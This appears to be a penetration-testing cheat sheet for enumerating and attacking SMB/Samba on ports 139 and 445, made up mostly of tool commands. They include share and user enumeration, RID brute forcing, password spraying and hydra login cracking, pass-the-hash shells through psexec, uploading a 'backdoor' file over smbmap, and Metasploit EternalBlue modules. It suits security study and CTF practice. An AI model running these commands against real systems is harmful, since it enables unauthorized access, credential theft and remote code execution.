☠️ ζHUB

139,445-SMB

Created: Feb 24, 2025
Updated: Apr 28, 2025

The Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network.

SAMBA is an alternative implementation of the SMB server, which developed for Unix-based operating systems.

Default Port: 139,445

Banner grabbing

nc -nv $IP 445

Nmap

Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on computer network by sending packets and analyzing the responses.

Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.

# Default NSE
sudo nmap -sCV -p445 $IP
 
# Enum version and dialect
sudo nmap -p445 --script=smb-protocols $IP
 
# Enum netbios of SMB
sudo nmap -p445 --script=smb-os-discovery $IP
 
# Enum security level/mode
sudo nmap -p445 --script=smb-security-mode $IP
 
# List available shares
sudo nmap -p445 --script=smb-enum-shares $IP
 
# Detect EternalBlue vulnerability
sudo nmap -p445 --script=smb-vuln-ms17-010 $IP
 
# Enum logged in user session
sudo nmap -p445 --script=smb-enum-sessions $IP
 
# Enum logged in user session with AUTHENTICATION
sudo nmap -p445 --script=smb-enum-sessions --script-args smbusername=administrator,smbpassword=password123 $IP
 
# Enum users with AUTHENTICATION
sudo nmap -p445 --script=smb-enum-users --script-args smbusername=administrator,smbpassword=password123 $IP
 
# Enum groups with AUTHENTICATION
sudo nmap -p445 --script=smb-enum-groups --script-args smbusername=administrator,smbpassword=password123 $IP
 
# List available shares with AUTHENTICATION
sudo nmap -p445 --script=smb-enum-shares --script-args smbusername=administrator,smbpassword=password123 $IP

SMBMap

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

# Check the shares permission with NULL session
smbmap -u guest -p "" -d . -H $IP
 
# Check the shares permission with AUTHENTICATION
smbmap -u "administrator" -p "password123" -H $IP
 
# List all the shares with AUTHENTICATION
smbmap -u "administrator" -p "password123" -H $IP -L
 
# List the share items with AUTHENTICATION
smbmap -u "administrator" -p "password123" -H $IP -r 'C$'
 
# Execute remote command with AUTHENTICATION
smbmap -u "administrator" -p "password123" -H $IP -x 'ipconfig'
 
# Upload file with AUTHENTICATION
smbmap -u "administrator" -p "password123" -H $IP --upload '/root/backdoor' 'C$\backdoor'
 
# Download file with AUTHENTICATION
smbmap -u "administrator" -p "password123" -H $IP --download 'C$\flag.txt'

SMBclient

SMBclient is a command-line tool for accessing and managing SMB shared resources on a network. It is commonly used in Linux and Unix environments to interact with Windows file shares.

# List all shares with NULL session
smbclient -L $IP -N
 
# Connect to selected share with NULL session
smbclient //$IP/<share> -N
 
# List all shares with AUTHENTICATION
smbclient -L \\\\$IP\\ -U administrator
 
# Connect to selected share with AUTHENTICATION
smbclient \\\\$IP\\<share> -U administrator
 
# Download recursively (without prompt)
smbclient -U administrator //$IP/<share> -c "prompt OFF; recurse ON; mget *"

NetExec

NetExec (AKA nxc) is a network service exploitation tool that helps automate assessing the security of large networks.

# Get Windows version
nxc smb $IP
 
# List shares and the permissions
nxc smb $IP -u "" -p "" --shares
 
# Password spraying
nxc smb $IP -u /wordlists.txt/users.txt -p /wordlists/passwords.txt --no-bruteforce

Rpcclient

Tool for executing client side MS-RPC functions.

rpcclient -U "" -N $IP                           # null sessions
rpcclient -U administrator%password123 $IP       # auth sessions
    > srvinfo                   # enum os version
    > enumdomusers              # enum all users
    > lookupnames admin         # enum user 
    > enumdomgroups             # enum groups
    > netshareenumall           # listing all shares
    > netsharegetinfo <share>   # more info about the share
    > queryuser <RID>           # more info on specific user

Brute-Force RIDs

# Bash oneliner RID bruteforce
for i in $(seq 500 1100);do rpcclient -N -U "" $IP -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
 
# Bash oneliner RID bruteforce,
# get the SID from administrator (rpcclient)[> lookupnames administrator]
for i in $(seq 500 5000); do rpcclient -N -U "" --password=anonymous $IP -c "lookupsids S-1-5-21-4078382237-1492182817-2568127209-$i"; done | grep -v "unknown"
 
# NetExec RID bruteforce
nxc smb $IP -u 'anonymous' -p '' --rid-brute

Enum4Linux-ng

Enum4linux-ng is a rewrite of Mark Lowe’s (former Portcullis Labs now Cisco CX Security Labs) enum4linux, a tool for enumerating information from Windows and Samba systems, aimed for security professionals and CTF players.

# Enum all things
enum4linux-ng -A $IP
 
# Get OS information via RPC
enum4linux-ng -O $IP
 
# Get users via RPC
enum4linux-ng -U $IP
 
# Get shares via RPC
enum4linux-ng -S $IP
 
# Get groups via RPC
enum4linux-ng -G $IP
 
# Get printer information via RPC
enum4linux-ng -I $IP
 
# Enum all things with AUTHENTICATION
enum4linux-ng -A -u "administrator" -p "password123" $IP
 
# Enum users SID with AUTHENTICATION
enum4linux -r default -u "administrator" -p "password123" $IP

Nmblookup

Designed to make use of queries for the NetBIOS names and then map them to their subsequent IP address in a network. All queries are done over UDP.

# Initial connection
nmblookup -A $IP
 
# For unique names: (code number)
00: Workstation Service (workstation name)
03: Windows Messenger service
06: Remote Access Service
20: File Service (also called Host Record)
21: Remote Access Service client
1B: Domain Master Browser Primary Domain Controller for a domain
1D: Master Browser
 
# For group names: (code number)
00: Workstation Service (workgroup/domain name)
1C: Domain Controllers for a domain
1E: Browser Service Elections

Impacket-PsExec

Impacket’s psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host.

# Login with AUTHENTICATION (prompt password)
impacket-psexec Administrator@$IP
 
# Pass-the-Hash
impacket-psexec Administrator@$IP -hashes <hash:hash>
impacket-psexec example.local/Administrator@$IP -hashes <hash:hash>

Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.

Link to original

hydra -L /wordlists.txt/users.txt -P /wordlists/passwords.txt $IP smb

Mounting

# Mount SMB share
sudo mount -t cifs -o username=administrator,password=password123 //$IP/<share> /mnt/smb-share
 
# Unmount the share
sudo umount -t cifs //$IP/<share> /mnt/smb-share

Metasploit Framework

Metasploit Framework is an open source platform that supports vulnerability research, exploit development, and the creation of custom security tools.

Link to original

auxiliary/scanner/smb/smb_version       # SMB version scanner
auxiliary/scanner/smb/smb2              # Detect SMB 2.0 protocol
auxiliary/scanner/smb/smb_enumusers     # Enum users via SAM RPC
auxiliary/scanner/smb/smb_enumshares    # Enum shares and list permissions
auxiliary/scanner/smb/smb_login         # Test a SMB login on a range of machines
auxiliary/scanner/smb/pipe_auditor      # Determine what named pipes are accessible over SMB
exploit/windows/smb/psexec              # Similar to "psexec" utility provided by SysInternals
 
auxiliary/scanner/smb/smb_ms17_010              # Scan the target for vulnerability
exploit/windows/smb/ms17_010_eternalblue        # Exploit the eternalblue
exploit/windows/smb/ms17_010_psexec             # Exploit the eternalblue
exploit/linux/samba/is_known_pipename           # Exploiting samba v3.5.0 (RCE)

Config files

# Default configuration (SAMBA)
cat /etc/samba/smb.conf | grep -v "#\|\;"

Dangerous settings

Some settings have their own advantages and disadvantages. If an employee can access sensitive information, an attacker can too.

SettingDescription
browseable = yesAllows users to see a list of available shared resources within the current share.
read only = noEnables users to create and modify files instead of restricting them to read-only access.
writable = yesGrants users permission to create and edit files.
guest ok = yesAllows anyone to access the shared resource without authentication.
enable privileges = yesHonors special privileges assigned to a Security Identifier (SID).
create mask = 0777Assigns full read, write, and execute permissions to newly created files.
directory mask = 0777Grants full permissions to newly created directories.
logon script = script.shExecutes a specified script when a user logs in.
magic script = script.shSpecifies a script to be executed when a file with a specific name is closed.
magic output = script.outDefines where the output of the magic script is stored.

Backlinks